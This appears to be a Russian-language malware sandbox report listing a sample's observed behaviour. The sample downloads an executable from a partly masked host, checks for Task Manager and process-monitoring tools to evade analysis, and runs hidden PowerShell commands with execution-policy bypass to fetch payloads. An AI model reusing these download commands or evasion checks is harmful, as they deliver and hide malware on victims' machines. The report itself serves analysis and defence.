Техническая информация
- http://03#####.netsolhost.com/aspnet_client/system_web/1_1_4322/x.d как %temp%\update_1.exe
- nul
- DNS ASK 03#####.netsolhost.com
- ClassName: '' WindowName: 'Task Manager'
- ClassName: '' WindowName: 'Windows Task-Manager'
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: '' WindowName: 'Resource Monitor'
- ClassName: '' WindowName: 'Process Hacker'
- ClassName: '' WindowName: 'Process Explorer'
- ClassName: '' WindowName: 'System Explorer'
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://03#####.netsolhost.com/aspnet_c...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://03#####.netsolhost.com/aspnet_c...
- '%WINDIR%\syswow64\ping.exe' -n 21 127.0.0.1
- '%WINDIR%\syswow64\ping.exe' -n 31 127.0.0.1